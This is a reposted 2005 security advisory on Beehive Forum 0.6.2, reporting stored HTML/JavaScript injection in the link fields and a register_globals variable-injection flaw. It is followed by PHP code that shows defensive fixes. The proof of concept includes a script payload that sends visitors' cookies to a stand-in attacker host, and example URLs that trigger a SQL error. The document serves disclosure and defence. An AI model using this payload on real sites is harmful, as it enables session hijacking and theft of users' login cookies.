beehiveforum Script Injection

2005.12.22
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

KAPDA New advisory

Vendor: http://www.beehiveforum.net
Vulnerable: Version 0.6.2
Bug: HTML Injection, Possible attacks with register_globals = On
Exploitation: Remote with browser

Description:
--------------------
Beehive Forum is a PHP-based message board system that uses a MySQL database.

Vulnerability:
--------------------
-HTML Injection:
The software does not properly filter HTML tags in the "Name", "Description" & "Comment" fields in 'links.php' & 'links_add.php', which may allow a remote user to inject HTML/JavaScript code. The hostile code may be rendered in the web browser of a victim user who visits these pages. (persistent)

POC:
--------------------
COMMENT: very nice link ;)<script>document.location.replace='http://hackersite.com /cgi-bin/evil_cookie_logger.cgi?'+document.cookie</script>

As a result, the code will be able to access the target user's cookies (including authentication cookies):
bh_sess_hash
bh_remeber_username
bh_remember_password
bh_remeber_passhash

-Possible attacks with register_globals = on
When register_globals = on, a malicious user may be able to set the $user_sess variable unexpectedly.

POC:
--------------------
http://example.com/beehive/index.php?user_sess=k

error:
--------------------
Error Message for server admins and developers:
Unknown error [1054] Unknown column 'k' in 'on clause'
SELECT FORUMS.FID, FORUMS.WEBTAG, CONCAT(FORUMS.WEBTAG, '', '_') AS PREFIX, FORUMS.ACCESS_LEVEL, USER_FORUM.ALLOWED FROM FORUMS FORUMS LEFT JOIN USER_FORUM USER_FORUM ON (USER_FORUM.FID = FORUMS.FID AND USER_FORUM.UID = k) WHERE DEFAULT_FORUM = 1
Unknown error in line 138 of file db_mysql.inc.php
--------------------
OR
http://example.com/beehive/index.php?user_sess=1+MYFORUM
...

The insufficient protection in index.php:
$forum_settings = forum_get_settings();
include_once(BH_INCLUDE_PATH. "header.inc.php");
include_once(BH_INCLUDE_PATH. "html.inc.php");
include_once(BH_INCLUDE_PATH. "lang.inc.php");
include_once(BH_INCLUDE_PATH. "light.inc.php");
include_once(BH_INCLUDE_PATH. "logon.inc.php");
include_once(BH_INCLUDE_PATH. "messages.inc.php");
include_once(BH_INCLUDE_PATH. "session.inc.php");
$user_sess = bh_session_check(false);

Solution:
--------------------
There is no vendor supplied patch for this issue at this time.

Original Advisories:
--------------------
http://kapda.ir/advisory-158.html
IN Farsi: http://irannetjob.com/content/view/177/28/

Credit:
--------------------
Discovered & released by trueend5 (trueend5 kapda ir)
Security Science Researchers Institute Of Iran [http://www.KAPDA.ir]
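The two weaknesses above have straightforward defensive counterparts: output-encode the link fields before they reach the browser, and make sure $user_sess can only be populated by the session check rather than by a request parameter. The PHP below is an added illustration and is not Beehive Forum's own code; the function names (bh_html_encode, bh_render_link, bh_drop_request_supplied, bh_default_forum_query) and the sample link record are assumptions made for the example. The query builder only reproduces the shape of the SELECT quoted in the advisory. register_globals itself was removed from PHP in 5.4, so the second guard matters only for the PHP 4/5 deployments this advisory targets.

```php
<?php
// Added example, not Beehive Forum's own code. Function names are hypothetical.
declare(strict_types=1);

// 1. HTML injection in links.php / links_add.php.
// Encode every user-supplied field at output time so that a stored payload
// such as the advisory's "<script>...</script>" is shown as literal text
// instead of executing in the viewer's browser.
function bh_html_encode(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Render one stored link record (name, description, comment) for display.
function bh_render_link(array $link): string
{
    return sprintf(
        '<li><b>%s</b>: %s<br><i>%s</i></li>',
        bh_html_encode((string) $link['name']),
        bh_html_encode((string) $link['description']),
        bh_html_encode((string) $link['comment'])
    );
}

// 2. With register_globals = On, ?user_sess=k pre-populates $user_sess.
// Before the session code runs, discard any global whose name matches a
// request-supplied key, so only bh_session_check() can set it.
function bh_drop_request_supplied(array $protected): void
{
    foreach ($protected as $name) {
        if (array_key_exists($name, $_GET)
            || array_key_exists($name, $_POST)
            || array_key_exists($name, $_COOKIE)) {
            unset($GLOBALS[$name]);
        }
    }
}

// The query quoted in the advisory interpolated the raw value into
// "USER_FORUM.UID = k". Forcing the UID to an integer before the query is
// built rules out that error and any non-numeric input reaching the SQL.
function bh_default_forum_query($uid): string
{
    $uid = (int) $uid;  // non-numeric input such as "k" becomes 0
    return 'SELECT FORUMS.FID, FORUMS.WEBTAG FROM FORUMS '
         . 'LEFT JOIN USER_FORUM ON (USER_FORUM.FID = FORUMS.FID '
         . 'AND USER_FORUM.UID = ' . $uid . ') WHERE DEFAULT_FORUM = 1';
}

// Demonstration with constructed input (run with: php example.php).
$link = [
    'name'        => 'Example',                                   // constructed
    'description' => 'A test entry',                              // constructed
    'comment'     => 'very nice link ;)<script>alert(1)</script>', // constructed
];
echo bh_render_link($link), PHP_EOL;

$_GET['user_sess'] = 'k';          // simulate the advisory's request
$user_sess = $_GET['user_sess'];   // what register_globals would have done
bh_drop_request_supplied(['user_sess']);
var_dump(isset($user_sess));       // the request-supplied value is gone

echo bh_default_forum_query('k'), PHP_EOL;
```

In a real deployment the encoding belongs in the template that prints the link list, not in the storage layer, so that the same stored value can also be safely exported to other contexts; the integer cast is a stand-in for a prepared statement where the database layer supports one.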


Copyright 2024, cxsecurity.com
